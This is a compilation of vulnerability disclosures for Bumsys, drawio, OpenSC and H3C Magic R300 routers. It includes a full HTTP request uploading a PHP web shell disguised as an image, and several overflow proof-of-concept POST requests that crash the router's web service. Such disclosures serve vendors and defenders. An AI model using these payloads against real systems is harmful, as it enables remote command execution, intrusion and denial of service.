Bumsys Business Management System version 1.0.3-beta suffers from a remote shell upload vulnerability.

Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload  
Google Dork : NA  
Date: 19-01-2023  
Exploit Author: AFFAN AHMED  
Vendor Homepage: https://github.com/unilogies/bumsys  
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip  
Version: 1.0.3-beta  
Tested on: Windows 11, XAMPP-8.2.0  
CVE : CVE-2023-0455

================================  
Steps_TO_Reproduce  
================================  
- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)  
- Click on action button to edit the Profile  
- Click on select logo button to upload the image  
- Intercept the POST Request  and do the below changes .

================================================================  
Burpsuite-Request  
================================================================  
POST /xhr/?module=settings&page=updateShop HTTP/1.1  
Host: demo.bumsys.org  
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7  
Content-Length: 1280  
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"  
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA  
Accept: */*  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://demo.bumsys.org  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.bumsys.org/settings/shop-list/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopName"

TEST  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopAddress"

 test   
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCity"

testcity  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopState"

teststate  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPostalCode"

700056  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCountry"

testIND  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPhone"

895623122  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopEmail"

test@gmail.com  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopInvoiceFooter"

 ------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"  
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>

====================================================================================  
Burpsuite-Response  
====================================================================================  
HTTP/1.1 200 OK  
Date: Thu, 19 Jan 2023 07:14:26 GMT  
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips  
X-Powered-By: PHP/7.0.33  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>

====================================================================================

VIDEO-POC : https://youtu.be/nwxIoSlyllQ

Bumsys Business Management System 1.0.3-beta Shell Upload

Cross-site Scripting (XSS) - Stored in GitHub repository jgraph/drawio prior to 21.2.8.

Expand Up @@ -1885,7 +1885,7 @@ GraphViewer.prototype.showLightbox = function(editable, closable, target) /\*\* \* Adds the given array of stencils to avoid dynamic loading of shapes. \*/ GraphViewer.prototype.showLocalLightbox \= function() GraphViewer.prototype.showLocalLightbox \= function(container) { var backdrop \= document.createElement('div');  
Expand Down Expand Up @@ -1921,6 +1921,17 @@ GraphViewer.prototype.showLocalLightbox = function() urlParams\['tags'\] \= '{}'; }  
if (container != null) { try { var toolbarConfig \= JSON.parse(decodeURIComponent(urlParams\['toolbar-config'\] || '{}')); toolbarConfig.noCloseBtn \= true; urlParams\['toolbar-config'\] \= encodeURIComponent(JSON.stringify(toolbarConfig)); } catch (e) {} }  
// PostMessage not working and Permission denied for opened access in IE9- if (document.documentMode \== null || document.documentMode \>= 10) { Expand Down Expand Up @@ -1961,20 +1972,23 @@ GraphViewer.prototype.showLocalLightbox = function()  
ui.destroy \= function() { mxEvent.removeListener(document.documentElement, 'keydown', keydownHandler); document.body.removeChild(backdrop); document.body.removeChild(closeImg); document.body.style.overflow \= overflow; GraphViewer.resizeSensorEnabled \= true;  
destroy.apply(this, arguments); if (container \== null) { mxEvent.removeListener(document.documentElement, 'keydown', keydownHandler); document.body.removeChild(backdrop); document.body.removeChild(closeImg); document.body.style.overflow \= overflow; GraphViewer.resizeSensorEnabled \= true;  
destroy.apply(this, arguments); } };  
var graph \= ui.editor.graph; var lightbox \= graph.container; lightbox.style.overflow \= 'hidden';  
if (this.lightboxChrome) if (this.lightboxChrome && container \== null) { lightbox.style.border \= '1px solid #c0c0c0'; lightbox.style.margin \= '40px'; Expand Down Expand Up @@ -2049,8 +2063,16 @@ GraphViewer.prototype.showLocalLightbox = function() lightbox.style.zIndex \= this.lightboxZIndex; closeImg.style.zIndex \= this.lightboxZIndex;  
document.body.appendChild(lightbox); document.body.appendChild(closeImg); if (container != null) { container.innerHTML \= ''; container.appendChild(lightbox); } else { document.body.appendChild(lightbox); document.body.appendChild(closeImg); }  
ui.setFileData(this.xml);  
Expand All @@ -2059,7 +2081,7 @@ GraphViewer.prototype.showLocalLightbox = function() ui.chromelessToolbar.style.zIndex \= this.lightboxZIndex;  
// Workaround for clipping in IE11- document.body.appendChild(ui.chromelessToolbar); (container || document.body).appendChild(ui.chromelessToolbar);  
ui.getEditBlankXml \= mxUtils.bind(this, function() { Expand Down

CVE-2023-3026: 21.2.8 release · jgraph/drawio@c7ac634

A vulnerbility was found in OpenSC. This security flaw cause a buffer overrun vulnerability in pkcs15 cardos_have_verifyrc_package. The attacker can supply a smart card package with malformed ASN1 context. The cardos_have_verifyrc_package function scans the ASN1 buffer for 2 tags, where remaining length is wrongly caculated due to moved starting pointer. This leads to possible heap-based buffer oob read. In cases where ASAN is enabled while compiling this causes a crash. Further info leak or more damage is possible.

**Problem Description**

On reviewing historical CVE vulnerabilities, I found a possible recurring vulnerability as CVE-2021-42782, which was reported by oss-fuzz and fixed in commit 1252aca.

The newly found issue exists in pkcs15-init module. Like the original bug in libopensc, cardos_have_verifyrc_package in pkcs15-cardos.c scans an ans1 buffer for 2 tags. The pointer p is moved after each sc_asn1_find_tag invocation, which results in the miscalculation of the length of left bytes in buffer and hence reading beyond the end of the buffer.

**Proposed Resolution**

Almost the same patch like 1252aca will do:

diff --git a/src/pkcs15init/pkcs15-cardos.c b/src/pkcs15init/pkcs15-cardos.c
index 9715cf39..f41f73c3 100644
\--- a/src/pkcs15init/pkcs15-cardos.c
+++ b/src/pkcs15init/pkcs15-cardos.c
@@ -872,7 +872,7 @@ static int cardos\_have\_verifyrc\_package(sc\_card\_t \*card)
        sc\_apdu\_t apdu;
         u8        rbuf\[SC\_MAX\_APDU\_BUFFER\_SIZE\];
         int       r;
\-       const u8  \*p = rbuf, \*q;
+       const u8  \*p = rbuf, \*q, \*pp;
        size\_t    len, tlen = 0, ilen = 0;

        sc\_format\_apdu(card, &apdu, SC\_APDU\_CASE\_2\_SHORT, 0xca, 0x01, 0x88);
@@ -888,13 +888,13 @@ static int cardos\_have\_verifyrc\_package(sc\_card\_t \*card)
                return 0;

        while (len != 0) {
\-               p = sc\_asn1\_find\_tag(card->ctx, p, len, 0xe1, &tlen);
\-               if (p == NULL)
+               pp = sc\_asn1\_find\_tag(card->ctx, p, len, 0xe1, &tlen);
+               if (pp == NULL)
                        return 0;
                if (card->type == SC\_CARD\_TYPE\_CARDOS\_M4\_3)     {
                        /\* the verifyRC package on CardOS 4.3B use Manufacturer ID 0x01 \*/
                        /\* and Package Number 0x07                                      \*/
\-                       q = sc\_asn1\_find\_tag(card->ctx, p, tlen, 0x01, &ilen);
+                       q = sc\_asn1\_find\_tag(card->ctx, pp, tlen, 0x01, &ilen);
                        if (q == NULL || ilen != 4)
                                return 0;
                        if (q\[0\] == 0x07)
@@ -902,7 +902,7 @@ static int cardos\_have\_verifyrc\_package(sc\_card\_t \*card)
                } else if (card->type == SC\_CARD\_TYPE\_CARDOS\_M4\_4)      {
                        /\* the verifyRC package on CardOS 4.4 use Manufacturer ID 0x03  \*/
                        /\* and Package Number 0x02                                      \*/
\-                       q = sc\_asn1\_find\_tag(card->ctx, p, tlen, 0x03, &ilen);
+                       q = sc\_asn1\_find\_tag(card->ctx, pp, tlen, 0x03, &ilen);
                        if (q == NULL || ilen != 4)
                                return 0;
                        if (q\[0\] == 0x02)

**Reference**

https://www.opencve.io/cve/CVE-2021-42782  
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=29912

CVE-2023-2977: Possible buffer overrun vulnerability in pkcs15 `cardos_have_verifyrc_package` · Issue #2785 · OpenSC/OpenSC

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit_BasicSSID interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the Edit\_BasicSSID interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit\_BasicSSID interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/Bk4CQusE3.png) In the Edit\_BasicSSID function, local variable v32 is 64 bytes long. !\[\](https://hackmd.io/\_uploads/HkxTRm\_s4h.png) V31 can be controlled by attacker, entered as parameter 'param'. In line 51, v31 is formatted into v32 by function sscanf as long as the size of the data we enter until ';' without filtering or checking length. So when the size of the data we enter before ';' is larger than 64 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/H1dtUui4h.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 602 CMD=Edit\_BasicSSID&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/H1Ni8dsV3.png) And you can write your own exp to get the root shell.

CVE-2023-33642: H3C Magic R300-2100M was discovered stack overflow via the Edit_BasicSSID interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the AddWlanMacList interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the AddWlanMacList interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the AddWlanMacList interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/ry9T-do4n.png) In the AddWlanMacList function, local variable v5 and v6 are both 32 bytes long. !\[\](https://hackmd.io/\_uploads/rkfRZui4n.png) V3 can be controlled by attacker, entered as parameter 'param'. In line 30, v3 is formatted into v5,v6 by function sscanf. So when the size of the data we enter between the first and second ';'(or the second and the third) is larger than 32 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/rJxnzOj4h.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 608 CMD=AddWlanMacList&param=1111;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/ryypGuiEn.png) And you can write your own exp to get the root shell.

CVE-2023-33643: H3C Magic R300-2100M was discovered stack overflow via the AddWlanMacList interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit_BasicSSID_5G interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the Edit\_BasicSSID\_5G interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the Edit\_BasicSSID\_5G interface at /goform/aspForm. ## Vulnerability Details !\[\](https://hackmd.io/\_uploads/H1Tdw\_jN2.png) In the Edit\_BasicSSID\_5G function, local variable v32 is 64 bytes long. !\[\](https://hackmd.io/\_uploads/SJvKvuiN2.png) V31 can be controlled by attacker, entered as parameter 'param'. In line 51, v31 is formatted into v32 by function sscanf as long as the size of the data we enter until ';' without filtering or checking length. So when the size of the data we enter before ';' is larger than 64 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://hackmd.io/\_uploads/HyT5IFjE3.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 611 CMD=Edit\_BasicSSID\_5G&param=1111;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://hackmd.io/\_uploads/r1LI7qiEn.png) And you can write your own exp to get the root shell.

CVE-2023-33638: H3C Magic R300-2100M was discovered stack overflow via the Edit_BasicSSID_5G interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the UpdateMacClone interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the UpdateMacClone interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the UpdateMacClone interface at /goform/aspForm. ## Vulnerability Details !\[\](https://i.imgur.com/XV02XyL.png) In the UpdateMacClone function, local variable v9 is 64 bytes long. !\[\](https://i.imgur.com/kfAEysE.png) V7 can be controlled by attacker, entered as parameter 'param'. In line 21, v7 is formatted into v9 by function sscanf as long as the size of the data we enter is less than 512 bytes. So when the size of the data we enter is larger than 64 bytes and less than 512 bytes, it will cause a stack overflow. ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://i.imgur.com/zcCWhYp.png) \`\`\` POST /goform/aspForm HTTP/1. Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG=; UPGRADE\_SOURCE= Connection: close Content-Length: 534 CMD=UpdateMacClone&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://i.imgur.com/oOVNgxA.png) And you can write your own exp to get the root shell.

CVE-2023-33635: H3C Magic R300-2100M was discovered stack overflow via the UpdateMacClone interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the ipqos_lanip_editlist interface at /goform/aspForm.

\# H3C Magic R300-2100M was discovered stack overflow via the ipqos\_lanip\_editlist interface at /goform/aspForm ###### tags: \`H3C\` \`Magic R300-2100M\` vendor:H3C product:Magic R300-2100M version:R300-2100MV100R004 type:Stack Overflow author:Yifeng Li，Wolin Zhuang; ## Vulnerability Description H3C Magic R300-2100M firmware version R300-2100MV100R004 was discovered to contain a stack overflow via the ipqos\_lanip\_editlist interface at /goform/aspForm. ## Vulnerability Details In function ipqos\_lanip\_editlist,the size of local variable v6 is noly 20 bytes long.Parameters in the ipqos\_lanip\_editlist interface use the getElement function to split strings(Var). !\[\](https://i.imgur.com/VC25Mi9.png) !\[\](https://i.imgur.com/Sk8HWLQ.png) The maximum size in the getElement function is limited to 64. The size of the original array has been completely exceeded, resulting in a buffer overflow vulnerability. !\[\](https://i.imgur.com/9e8xgUd.png) ## Recurring vulnerabilities and POC In order to reproduce the vulnerability, the following steps can be followed: 1. Upgrade router Magic\_R300-2100M to newest firmware(we have a physical machine) 2. Login to 192.168.124.1 as admin 3. Attack with the following POC !\[\](https://i.imgur.com/PpMbygV.png) !\[\](https://i.imgur.com/LcuzKxN.png) \`\`\` POST /goform/aspForm HTTP/1.1 Host: 192.168.124.1 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.124.1/mobile.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: USERLOGINIDFLAG=; LOGIN\_PSD\_REM\_FLAG= Connection: close Content-Length: 2032 CMD=ipqos\_lanip\_editlist&param=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa; \`\`\` By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to the crash of webs progress. !\[\](https://i.imgur.com/oOVNgxA.png) And you can write your own exp to get the root shell.

CVE-2023-33636: H3C Magic R300-2100M was discovered stack overflow via the ipqos_lanip_editlist interface at /goform/aspForm - HackMD

H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the EdittriggerList interface at /goform/aspForm.

